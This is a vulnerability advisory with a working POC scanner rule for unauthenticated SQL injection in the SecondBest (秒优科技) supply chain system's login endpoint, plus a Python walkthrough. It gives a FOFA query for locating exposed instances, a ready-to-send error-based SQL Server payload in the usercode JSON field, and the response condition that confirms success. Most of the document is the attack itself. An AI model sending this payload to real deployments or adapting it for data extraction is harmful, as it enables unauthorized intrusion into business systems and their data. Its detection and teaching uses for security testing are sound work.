Vulnerability Description
The SecondBest (秒优科技) Supply Chain Management System is vulnerable to SQL injection in its login interface, POST /zh/login/doAction.
The usercode field of the JSON request body is placed into a database query without sanitization or parameterization, so an unauthenticated attacker can inject SQL through the login request. The payload below is an error-based technique for Microsoft SQL Server: a string marker is forced through a varchar-to-int conversion and surfaces in the resulting error response.
FOFA: app="秒优科技-供应链管理系统"
id: secondbest-supply-chain-sqli
info:
  name: SecondBest Supply Chain Management System SQL Injection
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    The SecondBest (秒优科技) Supply Chain Management System is vulnerable to SQL injection in its login interface, POST /zh/login/doAction.
    The usercode field of the JSON request body is placed into a database query without sanitization or parameterization, so an unauthenticated attacker can inject SQL through the login request. The payload below is an error-based technique for Microsoft SQL Server: a string marker is forced through a varchar-to-int conversion and surfaces in the resulting error response.
    FOFA: app="秒优科技-供应链管理系统"
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%A7%92%E4%BC%98%E7%A7%91%E6%8A%80/%E7%A7%92%E4%BC%98%E7%A7%91%E6%8A%80-%E4%BE%9B%E5%BA%94%E9%93%BE%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FdoAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: secondbest,sqli
  created: 2024/12/31
rules:
  r0:
    request:
      method: POST
      path: /zh/login/doAction
      headers:
        Content-Type: application/json
      body: |
        {"usercode":"1'+(SELECT CHAR(83)+CHAR(87)+CHAR(119)+CHAR(105) WHERE 6635=6635 AND 2366 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2366=2366) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))))+'","password":"1","remember":false,"ip":null,"city":null,"ISERP":"ISERP"}
    # The injected CHAR() runs spell "qbbzq" + "1" + "qxkjq"; the IN (...) comparison makes
    # SQL Server convert that varchar to int, and the conversion error carries the marker
    # into the 500 response body.
    expression: response.status == 500 && response.body.bcontains(b'qbbzq1qxkjq')
expression: r0()
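To make the rule's logic concrete, here is an added Python example, written for this page and not part of the original POC or of the vendor's software. It decodes the CHAR() sequences in the payload to recover the marker the rule expects, evaluates the CASE expression the way the database would, and applies the rule's match expression to sample responses. The SQL Server attribution is inferred from the payload syntax (CHAR() with + concatenation and the varchar-to-int conversion trick); the response bodies and the base URL are constructed here and are not captured from any real deployment.

```python
import json
import re

# The request body from the r0 rule above, copied verbatim.
POC_BODY = {
    "usercode": (
        "1'+(SELECT CHAR(83)+CHAR(87)+CHAR(119)+CHAR(105) WHERE 6635=6635 AND 2366 IN "
        "(SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN "
        "(2366=2366) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+"
        "CHAR(106)+CHAR(113))))+'"
    ),
    "password": "1",
    "remember": False,
    "ip": None,
    "city": None,
    "ISERP": "ISERP",
}

# A run of CHAR(n)+CHAR(m)+... as SQL Server concatenates it.
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+?)+")
# The boolean-to-character CASE that sqlmap-style payloads embed between prefix and suffix.
CASE_RE = re.compile(r"CASE WHEN \((\d+)=(\d+)\) THEN CHAR\((\d+)\) ELSE CHAR\((\d+)\) END")


def decode_char_runs(sql: str) -> list[str]:
    """Decode every CHAR() concatenation run in `sql` to the text it produces."""
    runs = []
    for m in CHAR_RUN.finditer(sql):
        codes = [int(c) for c in re.findall(r"CHAR\((\d+)\)", m.group(0))]
        runs.append("".join(chr(c) for c in codes))
    return runs


def expected_marker(usercode: str) -> str:
    """Reconstruct the string the database error will contain.

    The marker is prefix + CASE result + suffix. Since the CASE condition is
    a tautology (2366=2366), the THEN branch ("1") is selected; the IN (...)
    comparison then forces a varchar-to-int conversion of the whole string,
    which fails and leaks the marker in the error text.
    """
    m = CASE_RE.search(usercode)
    if m is None:
        raise ValueError("payload does not contain the expected CASE expression")
    lhs, rhs, then_code, else_code = (int(x) for x in m.groups())
    middle = chr(then_code if lhs == rhs else else_code)
    prefix = decode_char_runs(usercode[: m.start()])[-1]  # last CHAR run before CASE
    suffix = decode_char_runs(usercode[m.end():])[0]      # first CHAR run after CASE
    return prefix + middle + suffix


def poc_request(base_url: str = "http://target.invalid") -> dict:
    """Assemble the HTTP request the rule sends. base_url is a placeholder, not a real host."""
    return {
        "method": "POST",
        "url": base_url + "/zh/login/doAction",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps(POC_BODY, ensure_ascii=False),
    }


def matches_rule(status: int, body: bytes, marker: bytes = b"qbbzq1qxkjq") -> bool:
    """Python equivalent of the rule expression:
    response.status == 500 && response.body.bcontains(b'qbbzq1qxkjq')

    Requiring the marker, not just a 500, keeps an unrelated server error from
    being reported as a finding.
    """
    return status == 500 and marker in body


# Constructed sample responses (modeled on a SQL Server conversion error; not real captures).
VULNERABLE_RESPONSE = (
    500,
    b'{"error":"Conversion failed when converting the varchar value '
    b"'qbbzq1qxkjq' to data type int.\"}",
)
PATCHED_RESPONSE = (401, b'{"code":401,"msg":"invalid user or password"}')
GENERIC_500 = (500, b"Internal Server Error")


if __name__ == "__main__":
    print("decoded CHAR runs:", decode_char_runs(POC_BODY["usercode"]))
    print("expected marker:", expected_marker(POC_BODY["usercode"]))
    for name, resp in [("vulnerable", VULNERABLE_RESPONSE),
                       ("patched", PATCHED_RESPONSE),
                       ("generic 500", GENERIC_500)]:
        print(f"{name}: matches rule = {matches_rule(*resp)}")
```

The decoded runs show what the payload actually sends: a throwaway string "SWwi" selected before the WHERE, the marker prefix "qbbzq", the two CASE branches "1" and "0", and the suffix "qxkjq". When re-running this POC against a patched build, a 500 without the marker is not a hit; it usually means an unrelated application error and should be triaged separately.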